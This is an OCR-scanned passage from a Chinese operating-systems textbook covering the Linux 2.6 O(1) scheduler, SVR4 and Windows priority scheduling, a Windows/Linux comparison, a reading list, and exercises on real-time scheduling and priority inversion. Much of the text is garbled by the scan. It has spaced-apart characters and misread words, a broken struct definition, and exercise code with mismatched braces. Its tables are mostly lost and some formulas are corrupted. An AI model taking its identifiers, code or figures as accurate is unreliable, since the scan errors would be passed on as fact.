@ Linux 2.4 采用 不 可 抢占 的 调度 策略 ， 这 意味 着 如 果 低 优先 级 的 任务 正在 执行 ， 则 高 优先 
级 任务 必须 等 待 它 结束 执行 。 
为 解决 这 些 问题 ，Linux 2.6 采用 了 一 种 全 新 的 优先 级 调度 策略 ， 称 为 O(1) 调 度 策略 S 。 这 
个 程序 的 设计 原则 是 不 管 系统 的 负载 或 者 处 理 器 的 数目 如 何 变化 ,选择 合适 的 任务 并 执行 的 时 刻 
都 是 恒定 的 。 
内 核 为 系统 中 的 每 个 处 理 器 都 维护 了 两 套 调 度 用 数据 结构 ， 如 下 所 示 ( 见 图 10.12 ): 
struc rio arra 
ng 队列 中 任务 的 数目 */ 
unsigned long bitmap[BITMAP_SIZE]; /* 优先 级 位 图 */ 
struct, list_head queue [MAX PRIO]; /* 优先 级 队列 */ 


O 术语 0(1)“ 大 -0” 表 示 法 的 一 个 例子 ， 用 于 表示 算法 的 时 间 复 杂 性 。 附 录 D 会 解释 这 种 表示 法 。 
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Linux 为 每 个 优先 级 级 别 维 护 了 一 个 单独 的 队列 。 总 的 队列 个 数 是 MAX_PRIO, 默认 值 是 140. 
这 个 结构 同样 包含 了 一 个 有 足够 大 小 的 位 图 数组 来 为 每 一 个 优先 级 级 别提 供 一 个 比特 。 因 此 ,在 
140 个 优先 级 级 别 以 及 32 比特 字 的 设 定 下 , BITMAP_SIZE 的 值 为 5; 这 就 创建 了 有 160 个 比特 的 
位 图 ， 其 中 20 个 比特 被 忽略 掉 。 位 图 指示 了 哪些 队列 是 空 的。 最 后 ，nr_active 指示 了 在 所 有 
队列 上 的 总 任务 的 个 数 。 这 两 个 结构 被 维护 为 :一 个 活动 的 队列 结构 和 一 个 过 期 的 队列 结构 。 

初始 化 的 时 候 ,位 图 都 被 设置 为 0， 表 示 所 有 的 队列 都 为 空 ， 当 一 个 进程 就 绪 的 时 候 ， 将 它 
放 到 合适 的 活动 优先 级 队列 中 , 并 且 被 赋予 了 合适 的 时 间 片 。 如 果 一 个 任务 在 完成 它 的 时 间 片 之 
前 被 抢占 , 则 它 将 会 返回 到 活动 队列 。 当 任务 完成 了 它 的 时 间 片 后 , 则 它 将 会 进入 合适 的 过 期 队 
列 并 被 赋予 新 的 时 间 片 。 所 有 的 调度 都 发 生 在 活动 队列 结构 的 任务 中 。 当 活动 队列 为 空 的 时 候 ， 
一 个 简单 的 指针 赋值 操作 进行 活动 队列 和 过 期 队列 之 间 的 转换 ， 调 度 继续 进行 。 

比特 0 “最 高 优先 级 的 


( g ) > 
优先 级 0) 非 空 激活 队列 激活 队列 ， 


140 个 优先 级 队列 ， 每 
个 队列 包含 了 具有 对 
4 应 优先 级 的 就 绪 任务 


全 比特 139 
(优先 级 139) 





过 期 队列 : 

140 个 具有 优先 级 的 队 
列 ; 每 个 队列 包含 了 具 
有 对 应 优先 级 的 时 间 片 
过 期 的 就 绪 任 务 
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[| 
i | | | 2 | 
过 期 队列 的 140 比特 优先 级 阵列 


图 10.12 每 个 处 理 器 的 Linux 调度 数据 结构 


Linux 的 调度 是 简单 且 有 效 的 。 对 一 个 给 定 的 处 理 器 ， 调 度 器 选择 具有 最 高 优先 级 的 非 空 队 
列 。 如 果 队 列 中 有 多 个 任务 ,任务 将 会 以 轮转 方式 进行 调度 。 

Linux 同样 包含 了 一 个 用 来 将 任务 从 一 个 处 理 器 移动 到 另 一 个 处 理 器 的 措施 。 调 度 器 周期 性 
的 检查 分 配给 每 个 处 理 器 的 任务 是 否 有 潜在 的 不 平衡 。 为 了 平衡 负载 ,调度 回 可 以 传递 一 些 任务 。 
具有 最 高 优先 级 的 活动 任务 被 选择 来 执行 传递 任务 ， 因 为 分 发 高 优先 级 的 任务 更 加 重要 。 
计算 优先 级 和 时 间 片 

每 一 个 非 实时 的 任务 都 被 分 配 了 一 个 范围 从 100 ~ 139 的 初始 优先 级 ,默认 值 是 120。 这 是 
任务 的 静态 优先 级 并 且 由 用 户 指定 。 随 着 任务 的 执行 , 动态 优先 级 作为 静态 优先 级 和 执行 行为 的 
函数 被 计算 出 来 。 比 起 处 理 器 密集 型 的 任务 ，Linux 调度 器 更 加 偏好 IO 密集 型 的 任务 。 这 种 策 
略 提 供 了 好 的 交互 响应 。Linux 使 用 的 决定 动态 优先 级 的 技术 是 维护 一 个 运行 的 表格 ， 这 个 表格 
是 关于 进程 睡眠 的 时 间 ( 等待 事件 ) 和 进程 运行 的 时 间 。 从 本 质 上 讲 , 大 部 分 时 间 是 在 睡眠 状态 
的 进程 应 该 拥有 较 高 的 优先 级 。 : 

时 间 片 分 配 的 范围 是 10 ~ 200ms。 一 般 而 言 ， 具 有 较 高 优先 级 的 任务 分 配 的 时 间 片 也 较 大 。 


与 实时 任务 的 关系 
在 优先 级 队列 中 , 处 理 实时 任务 的 方式 与 处 理 非 实时 任务 的 方式 不 同 。 应 用 了 下 面 一 些 考 虑 ; 
1) 所 有 的 实时 任务 具有 静态 的 优先 级 ; 不 会 作 动 态 优先 级 的 改变 。 
2) SCHED_FIFO 任务 没有 时 间 片 。 这 些 任 务 以 FIFO 的 方式 调度 。 如 果 一 个 SCHED FIFO 
任务 被 阻塞 ， 当 它 没有 被 阻塞 的 时 候 ， 将 返回 到 同样 优先 级 的 活动 队列 中 。 
3) SCHED Ra 任务 没有 分 配 时 间 片 , 它们 也 从 不 移 到 过 期 队列 中 。 当 一 个 scHED_RR 任务 用 
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完了 自己 的 时 间 片 后 , 它 将 返回 到 具有 同样 时 间 片 的 优先 级 队列 。 时 间 片 的 值 不 会 被 改变 。 
这 些 规 则 的 效果 是 活动 队列 与 过 期 队列 之 间 的 转换 仅仅 发 生 在 没有 准备 就 绪 的 实时 任务 在 
等 待 执行 的 时 候 。 


10.4 UNIX SVR4 调度 


UNIX SVR4 中 使 用 的 调度 算法 是 对 早期 UNIX 系统 所 使 用 的 调度 算法 (在 9.3 节 介 绍 过 ) 
的 全 面 修改 。 新 算法 被 设计 成 给 实时 进程 最 高 的 优先 权 , 给 内 核 态 的 进程 次 高 的 优先 权 , 给 其 他 
用 户 态 的 进程 ( 称 做 分 时 进程 9 ) 最 低 的 优先 权 。 

SVR4 中 实现 的 两 个 重要 的 修改 为 : 

1) 增加 了 可 抢占 的 静态 优先 级 调度 器 ， 引 进 了 160 种 优先 级 ， 并 划分 到 三 个 优先 级 类 中 。 

2 ) 插入 了 可 抢占 点 。 由 于 基本 内 核 是 不 能 被 抢占 的 ， 它 只 能 划分 成 许多 个 处 理 步 又 ， 每 一 
步 都 必须 一 直 运 行 到 完成 ， 中 间 不 能 被 中 断 。 在 处 理 步骤 之 间 ， 有 一 个 称 做 可 抢占 点 的 
安全 位 置 ， 在 这 里 ， 内 核 可 以 安全 地 中 断 处 理 ， 
并 调度 一 个 新 进程 。 安 全 位 置 定义 成 一 个 代码 区 
域 ， 在 这 里 所 有 的 内 核 数据 结构 或 者 是 已 经 更 新 
且 一 致 的 ， 或 者 通过 一 个 信号 量 被 锁定 。 

图 10.13 给 出 了 SVR4 中 定义 的 160 个 优先 级 。 每 个 
进程 定义 成 属于 这 三 类 优先 级 中 的 一 类 , 并 被 指定 为 具有 
该 类 中 的 一 个 优先 级 。 这 三 类 优先 级 为 : 

© 实时 〈159~100): 具有 这 些 优先 级 的 进程 可 以 保 
证 在 任何 内 核 进程 或 分 时 进程 之 前 被 选择 运行 。 
此 外 ， 实 时 进程 可 以 使 用 可 抢占 点 抢占 内 核 进 程 
和 用 户 进程 。 

@ 内 核 (99 一 60): 具有 这 些 优先 级 的 进程 保证 在 
任何 分 时 进程 之 前 被 选择 运行 , 但 必须 服从 实时 
进程 。 

@ 分 了 时 (59~0): 最 低 优 先 级 的 进程 ， 通 常 是 除了 
实时 应 用 程序 以 外 的 用 户 应 用 程序 。 

图 10.14 显示 了 SVR4 中 是 如 何 实现 调度 的 。 每 个 优先 级 都 关联 着 一 个 调度 队列 ， 在 某 一 给 

定 优先 级 的 进程 按 循 环 方式 执行 。 有 一 个 位 示 图 向 量 aqactmap, 它 的 每 一 位 对 应 于 各 个 优先 级 。 
如 果 某 个 优先 级 上 的 队列 不 为 空 ， 则 相应 的 位 被 置 为 1。 当 一 个 正在 运行 的 进程 由 于 阻塞 、 时 间 
片 到 期 或 抢占 等 原因 离开 运行 状态 时 , 调度 器 检查 dqactmap, 并 从 优先 级 最 高 的 非 空 队列 中 调 
度 一 个 就 绪 进 程 。 此 外 ， 当 到 达 一 个 定义 的 可 抢占 点 时 ， 内 核 检 查 一 个 称 做 kprunrun 的 标记 ， 
如 果 它 被 置 位 , 则 表明 至 少 有 一 个 实时 进程 处 于 就 绪 状 态 , 如 果 当 前 进程 的 优先 级 低 于 优先 级 最 
高 的 实时 就 绪 进 程 ， 则 内 核 抢 占 当 前 进程 。 







优先 级 类 EE 调度 顺序 








图 10.13 SVR4 的 优先 级 类 








图 10.14 SVR4 调度 队列 


O 分 时 进程 指 在 传统 的 分 时 系统 中 表示 拥护 的 进程 。 
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在 分 时 类 中 ,进程 的 优先 级 是 可 变 的 。 每 当 一 个 进程 用 完 它 的 时 间 片 时 ,调度 器 降低 它 的 优 
先 级 ; 如 果 一 个 进程 在 一 个 事件 或 资源 上 阻塞 时 , 则 调度 器 提高 它 的 优先 级 。 分 配给 分 时 进程 的 
时 间 量 取 决 于 它 的 优先 级 ， 其 范围 从 给 优先 级 0 分 配 的 100ms 到 给 优先 级 59 分 配 的 10ms。 每 
个 实时 进程 都 有 一 个 国定 的 优先 级 和 固定 的 时 间 量 。 


Windows 和 Linux 的 比较 一 一 调度 策 路 
Windows Linux 


一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 ~ 
- 去 = 
OCHRE, HEA CPU 维护 一 个 优先 级 列表 woe 增加 了 O(1) 调 度 ， 为 每 个 CPU 维护 


优先 数 越 小 优先 级 越 低 和 其 他 UNIX 风格 一 样 ， 优 先 数 越 低 ， 优 先 级 越 高 
16 个 非 实时 的 优先 级 (0 ~ 15) 40 个 非 实时 优先 级 ( 100 ~ 139) 

Linux 运行 高 优先 级 非 实 时 进程 直到 达到 它们 的 读 额 
(由 CPU 型 进程 )， 这 种 情形 下 低 优 先 级 的 进程 运行 被 运 
行 直 到 它们 的 配额 用 完 















最 高 优先 级 的 可 运行 线程 ( 几乎 ) 总 会 被 调度 到 处 理 
器 上 








应 用 程序 能 指定 CPU 亲 和 处 理 器 ， 并 遵从 这 种 约束 ， 
调度 程序 挑选 一 个 理想 的 处 理 器 ， 其 目的 总 是 试图 达到 
更 好 的 高 速 缓存 性 能 。 但 是 线程 被 移 到 了 其 他 空闲 的 
CPU 或 正在 运行 更 低 优 先 级 线程 的 CPU 上 














优先 级 反 转 由 一 个 crude 机 制 管理 , 这 一 机 制 给 予 那 些 
已 经 长 期 处 于 饥饿 的 线程 极 大 的 优先 级 提升 








允许 低 优先 级 进程 在 已 经 用 完 配 额 高 优先 级 进程 之 前 
运行 ， 以 此 避免 了 饥饿 ， 同 时 不 需要 优先 级 反 转 











动态 地 调整 非 实时 线程 的 优先 级 以 给 予 前 台 应 用 程序 


和 IO 更 好 的 性 能 。 优先 级 从 底部 往 上 提升 , 并 在 用 完 配 


额 时 被 降低 






调度 程序 周期 性 地 将 繁忙 CPU 的 就 绪 队 列 中 的 进程 移 
动 到 未 充分 使 用 的 CPU 的 就 绪 队 列 中 去 ， 以 对 处 理 器 负 
载 进行 均衡 

表 均 稀 是 基于 系统 定义 的 调度 域 而 不 是 进程 的 亲 和 性 
( 即 对 应 于 NUMA 节点 ) 





支持 非 均衡 存储 器 访问 
在 非 实 时 优先 级 之 上 的 16 个 实时 优先 级 ( 16 ~ 31) 














支持 非 均 衡 存 储 器 访问 
在 非 实 时 优先 级 之 上 的 99 个 实时 优先 级 ( 1 ~ 99 ) 





实时 线程 使 用 Round-Robin 调度 策略 


实时 进程 调度 既 能 用 Round-Robin 也 能 用 FIFO， 这 意 
味 着 它们 只 能 被 更 高 优先 级 的 实时 进程 抢占 








10.5 Windows 调度 


Windows 被 设计 成 在 高 度 交互 的 环境 中 或 者 作为 服务 器 尽 可 能 地 响应 单个 用 户 的 需求 。 
Windows 实现 了 可 抢占 式 调度 器 , 它 具 有 灵活 的 优先 级 系统 ,在 每 一 级 上 都 包括 了 轮转 调度 方法 ， 
在 某 些 级 上 ， 优 先 级 可 以 基于 它们 当前 的 线程 活动 而 动态 变化 。 在 Windows 系统 中 ， 处 理 器 的 
调度 单位 是 线程 而 不 是 进程。 


10.5.1 进程 和 线程 优先 级 


Windows 中 的 优先 级 被 组 织 成 两 段 ( 两 类 ): 实时 和 可 变 。 每 一 段 包括 16 种 优先 级 。 需 要 立 
即 关 注 的 线程 在 实时 类 中 ， 它 包括 诸如 通信 之 类 的 功能 和 实时 任务 。 

大 体 来 说 ， 由 于 Windows 使 用 了 一 种 基于 优先 级 的 抢占 式 调度 器 ， 因 而 具有 实时 优先 级 的 
线程 优先 于 其 他 线程 。 在 单 处 理 器 中 , 当 一 个 线程 就 绪 时 ,如 果 它 的 优先 级 高 于 当前 正在 执行 的 
线程 ,那么 低 优先 级 的 线程 被 抢占 ， 具 有 更 高 优先 级 的 进程 占用 处 理 器 。 

这 两 类 优先 级 的 处 理 方式 有 一 定 的 不 同 ( 见 图 10.15). 在 实时 优先 级 类 中 ,所 有 线程 具有 固 
定 的 优先 级 , 并 且 它 们 的 优先 级 永远 不 会 改变 , 某 一 给 定 优先 级 的 所 有 活动 线程 在 一 个 轮转 队列 
中 。 在 可 变 优先 级 类 中 , 一 个 线程 的 优先 级 在 开始 时 是 最 初 指定 的 值 , 但 在 它 的 生命 周期 中 可 能 
会 临时 性 上 升 。 每 个 优先 级 都 有 一 个 FIFO 队列 。 当 一 个 线程 的 优先 级 发 生变 化 时 ， 它 将 在 可 变 
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优先 级 类 中 一 Sh pr ig a al 优先 级 低 于 15 的 线程 永远 不 能 提升 到 16 或 以 上 ， 
也 就 是 实时 类 的 优先 级 别 。 





图 10.15 Windows 线程 调度 优先 级 


对 于 可 变 优先 级 类 中 的 线程 , 它 最 初 的 优先 级 是 由 两 个 值 确 定 的 : 进程 的 基本 优先 级 和 线程 
的 基本 优先 级 。 进 程 基 本 优先 级 是 进程 对 象 的 一 个 属性 ， 它 可 以 取 从 0 到 15 的 任何 值 。 与 进程 
对 象 相 关联 的 每 个 线程 对 象 有 一 个 线程 基本 优先 级 属性 ， 表 明 该 线程 相对 于 该 进程 的 基本 优先 
级 。 线程 的 基本 优先 级 可 以 等 于 它 的 进程 的 基本 优先 级 , 或 者 比 进程 的 基本 优先 级 高 2 级 或 低 2 
级 。 因 此 ， 如 果 一 个 进程 的 基本 优先 级 为 4， 它 的 某 个 线程 的 基本 优先 级 为 -1， 则 该 线程 最 初 的 
优先 级 为 3。 


m a 
A U 








or NY RUM DN OH DO Oe N WwW 


进程 优 线程 的 基 线程 的 动 
先 级 本 优先 级 态 优先 级 


10.16 关于 Windows 优先 级 关系 的 一 个 例子 
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一 且 一 个 可 变 优先 级 类 中 的 线程 被 激活 , 则 它 的 实际 优先 级 称 做 该 线程 的 当前 优先 级 , 可 以 
在 给 定 的 范围 内 波动 。 当前 优先 级 永远 不 会 低 于 该 线程 的 基本 优先 级 的 下 限 ， 也 永远 不 会 超过 
15。 图 10.16 给 出 了 一 个 例子 。 一 个 进程 对 象 的 基本 优先 级 属性 值 为 4， 与 这 个 进程 对 象 相 关联 
的 每 个 线程 对 象 的 最 初 优先 级 一 定 在 2 和 6 之 间 。 假设 线程 的 基本 优先 级 是 4, 那么 该 线程 的 当 
前 优先 级 根据 需求 在 4 到 15 之 间 变 动 ， 如 果 由 于 IO 事件 导致 线程 被 中 断 ，Windows 内 核 将 提 
升 这 个 线程 的 优先 级 。 当 一 个 被 提升 优先 级 的 线程 由 于 用 完了 时 间 配 额 而 被 中 断 时 ， 内核 将 降低 
它 的 优先 级 。 可 见 人 处理 器 密集 型 的 线程 趋向 于 具有 较 低 的 优先 级 , 而 VO 密集 型 的 线程 则 可 能 拥 
有 更 高 的 优先 级 。 对 于 IO 密集 型 的 线程 ,执行 体 为 交互 式 等 待 ( 例如 等 待 键盘 或 显示 ) 而 提高 
它 的 优先 级 ， 其 幅度 要 比 为 其 他 MO 类 型 ( 如 磁盘 VO) 而 提高 优先 级 的 幅度 大 。 因 此 ， 在 可 恋 
优先 级 类 中 ， 交 互 式 线程 往往 具有 最 高 的 优先 级 。 


10.5.2 多 处 理 器 调度 


当 Windows 运行 在 一 个 处 理 器 上 时 ， 优 先 级 最 高 的 线程 总 是 活跃 的 ， 除 非 它 正 在 等 待 一 个 
事件 。 如 果 有 多 个 线程 具有 相同 的 最 高 优先 级 , 则 处 理 器 在 这 一 级 的 所 有 线程 间 被 循环 共享 。 在 
一 个 具有 N 个 处 理 器 的 多 处 理 器 系统 中 , 内 核 试图 将 N 个 最 高 优先 级 的 就 绪 线 程 分 配给 处 理 器 ， 
余下 的 低 优先 级 线程 必须 等 待 , 直到 处 理 器 上 的 线程 被 阻塞 或 其 优先 级 被 降低 。 低 优先 级 线程 在 
饥饿 状态 下 ， 其 优先 级 有 可 能 被 短暂 地 提升 到 15， 只 是 为 了 纠正 优先 级 反 转 的 现象 。 

上 述 调度 原则 受 线程 的 处 理 器 亲 和 (processor affinity) 属性 的 影响 。 如 果 一 个 线程 准备 执 
行 , 但 是 唯一 可 用 的 处 理 器 不 在 它 的 处 理 器 亲 和 集 合 中 ， 则 该 线程 被 迫 等 待 ， 内 核 调度 下 一 个 可 
以 得 到 的 线程 。 
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对 于 紧 耦 合 的 多 处 理 器 ,多 个 处 理 器 可 以 使 用 同一 个 内 存 。 在 这 种 配置 中 , 调度 结构 更 加 复 
杂 。 例如 , 某 个 给 定 的 进程 在 它 的 生命 周期 中 可 以 分 配 到 同一 个 处 理 器 中 , 也 可 以 当 它 每 次 进入 
运行 状态 时 ,分派 到 任何 一 个 处 理 器 上 。 关 于 性 能 的 研究 表明 , 在 多 处 理 器 系统 中 , RAWEA 
法 之 间 的 差别 并 不 是 很 重要 。 

实时 进程 或 任务 是 指 该 进程 的 执行 与 计算 机 系统 外 部 的 某 些 进程 、 功 能 或 事件 集合 有 关 , 并 
且 为 了 保证 有 效 和 正确 地 与 外 部 环境 交互 , 必须 满足 一 个 或 多 个 最 后 期 限 。 实时 操作 系统 是 指 能 
够 管理 实时 进程 的 操作 系统 。 在 实时 操作 系统 中 , 传统 的 调度 算法 原则 不 再 适用 ,关键 因素 是 满 
足 最 后 期 限 。 在 很 大 程度 上 依靠 抢占 和 对 相对 最 后 期 限 有 反应 的 算法 适合 于 这 种 上 下 文 。 


10.7 推荐 读物 


[WEND89] 讲 述 了 多 处 理 器 调度 的 方法 。 关 于 实时 调度 的 较 好 论述 见 [LIU00]。 下 面 的 论文 集 都 包括 关 
于 实时 操作 系统 和 实时 调度 的 重要 文章 : [ KRIS94 ]、[ STAN93 ]、[ LEE93 ] 和 [ TILB91 ]。[SHA90] 较 好 地 
阐述 了 优先 级 反 转 、 优 先 级 继承 和 优先 级 置顶 。[ ZEAD97 ] 分 析 了 SVR4 实时 调度 器 的 性 能 。[LIND04] 概 
述 了 Linux 2.6 调度 器 ，[LOVE05] 包 含 了 更 为 详细 的 讨论 。 
KRIS94 Krishna, C., and Lee, Y., eds. “Special Issue on Real-Time Systems. ” Proceedings of the IEEE, 
January 1994. 
LEE93 Lee, Y., and Krishna, C., eds. Readings in Real-Time Systems. Los Alamitos, CA: IEEE Computer 
Society Press, 1993. 
LIND04 Lindsley,R. “What’s New in the 2.6 Scheduler.” Linux Journal, March 2004. 
LIU00 Liu,J.Real-Time Systems. Upper Saddle River,NJ: Prentice Hall,2000. 
LOVE05 Love,R.Linux Kernel Development. Waltham,MA:Novell Press,2005. 


#10 Ë ZABBRPSHAR 329 


SHA90 Sha,L.;Rajkumar,R.;and Lehoczky,J. “Priority Inheritance Protocols: An Approach to Real-Time 
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TILB91 Tilborg, A., and Koob, G.. eds. Foundations of Real-Time Computing: Scheduling and Resource 
Management. Boston: Kluwer Academic Publishers, 1991. 


. WEND89 Wendorf, J.; Wendorf, R.; and Tokuda, H.“Scheduling Operating System Processing on 


Small-Scale Microprocessors.” Proceedings, 22nd Annual Hawaii International Conference on System 
Science, January 1989. 

ZEAD97 Zeadally, S. “An Evaluation of the Real-Time Performance of SVR4.0 and SVR4.2.” Operating 
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10.8 关键 术语 、 复 习题 和 习题 


关键 术语 
非 周期 性 任务 粒度 速率 单调 调度 线程 调度 
限期 调度 硬 实 时 任务 实时 操作 系统 无 界 优先 级 
确定 性 操作 系统 负载 共享 实时 调度 反 转 
故障 弱化 运行 周期 性 任务 响应 性 软 实时 任务 
组 调度 优先 级 反 转 

复习 题 


10.1 


列 出 并 简单 定义 五 种 不 同 级 别 的 同步 粒度 。 


10.2 列 出 并 简单 定义 线程 调度 的 四 种 技术 。 
10.3 列 出 并 简单 定义 三 种 版 本 的 负载 分 配 。 
10.4” 硬 实时 任务 和 软 实时 任务 有 什么 区 别 ? 
10.5 周期 性 实时 任务 和 非 周 期 性 实时 任务 有 什么 区 别 ? 
10.6 列 出 并 简单 定义 对 实时 操作 系统 的 五 方面 的 要 求 。 
10.7 列 出 并 简单 定义 四 类 实时 调度 算法 。 
108 ”关于 一 个 任务 的 哪些 信息 在 实时 调度 时 非常 有 用 ? 
习题 
10.1 考虑 一 组 周期 任务 (三 个 )， 表 10.5 给 出 了 它们 的 执行 简 表 。 按 照 类 似 于 图 10.6 的 形式 ， 给 出 关于 
这 组 任务 的 调度 图 。 
表 10.5 习题 10.1 的 执行 简 表 
进 程 到 达 时 间 执行 时 间 完成 最 后 期 限 
AD 0 on woo 
A(2) 20 10 40 
B (1) 0 10 50 
B(2) 50 10 100 
ca) 0 15 50 
C (2) 50 15 100 
10.2 ”考虑 一 组 非 周期 性 任务 (5), #106 给 出 了 它们 的 执行 简 表 。 按 照 类 似 于 图 10.7 的 形式 ， 给 出 
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10.3 


10.4 
10.5 


10.6 


10.7 








关于 这 组 任务 的 调度 图 。 
表 10.6 习题 10.2 的 执行 简 表 
+ g 到 达 时 间 执行 时 间 启动 最 后 期 限 
A 10 20 100 
B 20 20 30 
C 40 20 60 
D 50 20 80 
E 60 20 70 





最 低 松 弛 度 优 先 (Least Laxity First, LLF ) 算法 是 一 种 为 实时 系统 中 周期 性 任务 设计 的 一 种 调度 算 
法 。 松 弛 度 是 指 ， 一 个 进程 如 果 现 在 开始 执行 ， 其 预期 结束 时 间 和 其 截止 时 间 之 间 的 时 间 间 隔 。 这 
同时 也 是 一 个 可 供 调度 的 时 间 窗 口 。 松 弛 度 可 以 被 定义 为 : 
松弛 度 = 截止 时 间 - 当前 时 间 - 程序 执行 所 需 时 间 
LLF 选择 松弛 度 最 低 的 进程 开始 执行 ， 如 果 两 个 进程 的 松弛 度 相 同 ， 则 采用 上 先 来 先 服务 的 策略。 
a) 假设 一 个 任务 的 松弛 度 为 :， 则 调度 算法 最 多 将 该 任务 延迟 多 久 启 动 ， 才 能 保证 其 在 截止 时 间 前 
完成 ? 
b) 假设 一 个 任务 的 松弛 度 为 0, 说 明了 一 种 什么 情况 ? 
c) 如 果 一 个 任务 的 松弛 度 为 负数 表示 什么 意义 ? 
d) 如 果 有 一 组 (3 个 ) 周期 性 任务 ,其 执行 特征 如 表 10.7a 所 示 , 绘制 一 个 如 图 10.5 的 调度 序列 表 ， 
比较 在 这 组 任务 上 分 别 使 用 速率 单调 调度 、 最 早 截 止 时 间 优 先 、 最 低 松 弛 度 优先 三 种 调度 算法 进 
行 处 理 ， 并 对 结果 进行 分 析 。 假 设 系统 的 抢占 调度 的 周期 为 Sms。 


表 10.7 习题 10.3 到 习题 10.6 的 执行 简 表 










执行 时 间 
2 











使 用 表 10.7b 中 的 参数 重复 10.3 的 d 问题 ， 并 对 结果 进行 分 析 。 
最 大 紧迫 度 优先 (Maximum Urgency First, MUF ) 算法 是 一 种 用 于 周期 性 任务 的 实时 调度 算法 。 对 
每 项 任务 分 配 一 个 紧迫 度 值 ， 该 值 的 定义 是 两 个 固定 优先 级 和 一 个 动态 优先 级 的 组 合 。 其 中 一 个 固 
定 的 优先 级 是 决定 性 的 ， 优 先 于 动态 优先 级 。 同 时 ， 该 动态 优先 级 优 于 另 一 个 固定 优先 级 ， 后 一 个 
国定 优先 级 被 称 为 用 户 优 先 级 。 动 态 优先 级 与 一 个 任务 的 松弛 程度 成 反比 。 可 以 将 MUF 解释 如 下 。 
首先 ， 任 务 按 最 短 到 最 长 周期 排序 。 将 前 NN 个 任务 定义 为 关键 任务 集 ， 这 样 ， 在 最 坏 的 情况 下 ， 处 
理 器 的 利用 率 也 不 会 超过 100% 。 如 果 在 关键 任务 集中 含有 就 绪 的 任务 , 调度 器 在 关键 任务 集中 选取 
一 个 松弛 度 最 低 的 任务 ; 否则 调度 器 就 在 非 关键 任务 集中 选择 一 个 松弛 度 最 低 的 任务 。 通 过 一 个 可 
选 的 用 户 优 先 级 ， 然 后 使 用 FCFS， 就 可 以 打破 这 种 限制 。 重 复习 题 10.3d, 将 MUF 加 进 图 表 。 假设 
用 户 定义 的 优先 级 是 :A 最 高 ，B 其 次 和 C 最低。 并 对 结果 进行 分 析 。 
回顾 本 章 中 提 到 的 等 式 10.1 和 10.2， 回 答 下 列 问 题 ， 
a) 证 明 等 式 10.2 的 右边 的 算法 时 间 复 杂 度 是 RMS 调度 算法 时 间 复 杂 度 的 In2 倍 
b) 设 有 两 个 进程 C, C, CMER Z :被 调 入 CPU 执行 ， 其 完成 工作 所 需要 的 时 间 如 下 : 

Cı = sin’2(4 

C2 = 1/sec’2(£) 

其 中 上 是 系统 从 开机 开始 直到 进程 开始 运行 所 经 过 的 时 间 ,单位 是 秒 。 如 果 这 两 个 进程 每 次 调度 ， 
被 允许 在 CPU 上 的 运行 的 时 间 长 度 为 7， 那么 了 的 值 为 多 少时 ， 采 用 RMS 调度 算法 可 以 保证 这 两 
个 进程 每 次 运行 都 能 在 时 间 了 内 完成 其 计算 工作 ? 
这 个 习题 用 于 说 明 对 于 速率 单调 调度 ， 式 ( 10.2 ) 是 成 功 调度 的 充分 条 件 , 但 它 并 不 是 必要 条 件 [ 也 
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10.8 


就 是 说 ， 有 些 时 候 ， 尽 管 不 满足 式 (10.2) 也 有 可 能 成 功 调度 ]。 


a) 考虑 一 个 任务 集 ， 包 括 以 下 独立 的 周期 任务 ; 


@ 任务 Pi: Ci 一 20; 7,;=100 
@ 任务 Pz: Co=30; T=145 


使 用 速率 单调 调度 ， 这 些 任 务 可 以 成 功 地 调度 吗 ? 


b) 现在 再 往 集 合 中 增加 以 下 任务 ; 


© 任务 P3: C3=68; Ts 二 150 
式 (10.2) 可 以 满足 吗 ? 
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c) 假设 前 述 的 三 个 任务 的 第 一 个 实例 在 0 时 到 达 ， 并 假设 每 个 任务 的 第 一 个 最 后 期 限 如 下 : 
Di=100; (_] D;=145; [_] D3=150 
如 果 使 用 速率 单调 调度 ， 请 问 这 三 个 最 后 期 限 都 能 得 到 满足 吗 ? 每 个 任务 循环 的 最 后 期 限 是 多 少 ? 


阅读 下 列 三 段 代 码 并 回答 问题 。 


a) 找 出 每 段 代码 中 可 能 产生 的 同步 问题 。 
b ) 在 这 三 段 代码 中 , 哪 一 段 代 码 的 同步 问题 是 由 于 进程 优先 级 设置 不 当 导致 的 ? (which error requires 
the implicit notion of process preemption by priority?) 简 要 解释 优先 级 极限 如 何 消除 这 有 段 代码 中 的 问 


Priority High 

void f() 

{ 
acquire_lock(); 
short_compute (); 
release_lock(); 


Process 1, 


} 
Process 2, Priority Medium 


Process 3, Priority Low 


void h(} 
{ 
acquire_lock()}; 
for(;;}{ 
long_compute (); 
} 
} 


Process 1, Priority High 

void f() 

{ 
acquire_lock(}; 
long_compute (); 
release_lock()}; 


} 


Process 2, Priority Medium 


void gtunsigned v) 


while (++v) ( 
} v= 2; 


} 
Process 3, Priority Low 


acquire_lock(); 
short_compute()};: 
release_lock(); 


Process 1, Priority High 


acquire_lock_x(); 
acquire_lock_y(}; 
long_compute(); 
release_lock_y(); 
release_lock_x(); 

} 

Process 2, Priority Medium 


acquire_lock_y (); 
shared_variable_b = 2; 
release_lock_y(); 

} 

Process 3, Priority Low 


acquire_lock_y():;: 
acquire_lock_x(); 
short_compute(}; 
release_lock_x(}; 
} release_lock_y(); 




















操作 系统 设计 中 最 繁杂 的 部 分 是 处 理 IJO 设备 和 文件 管理 系统 。 对 于 JI/O 而 言 ， 主 要 问题 是 
性 能 。I/O 设备 是 真正 的 性 能 斗争 战场 。 看 一 看 计算 机 系统 的 内 部 操作 ， 我 们 发 现 处 理 器 速度 不 
断 地 提高 ， 而 且 如 果 一 个 处 理 器 还 不 够 快 的 话 ， 那 么 SMP 架构 提供 多 个 处 理 器 来 加 带 其 工作 。 
内 存 的 访问 速度 也 在 不 断 提高 ， 但 是 并 没有 处 理 器 加 速 那么 快 。 尽 管 如 此 ， 通 过 巧妙 利用 一 级 、 
二 级 或 害 更 多 级 内 部 高 速 猴 存 ， 内 存 的 访问 速度 可 以 与 处 理 器 的 速度 匹配 。 但 IO 仍然 是 一 个 重 
要 的 性 能 挑战 ， 尤 其 是 对 于 磁盘 存储 而 言 。 


对 于 文件 系统 ， 性 能 也 是 一 个 问题 。 但 同样 需要 关注 其 他 的 设计 需求 ， 如 可 靠 性 和 安全 性 。 
从 用 户 的 角度 来 看 , 文件 系统 也 许 是 操作 系统 中 最 重要 的 方面 : 用 户 希 望 快速 访问 文件 但 要 确保 
文件 不 会 被 破坏 ， 同 时 文件 不 能 被 未 授权 的 用 户 访问 。 


第 五 部 分 导读 


第 11 章 : 1/O 管理 和 磁盘 调度 


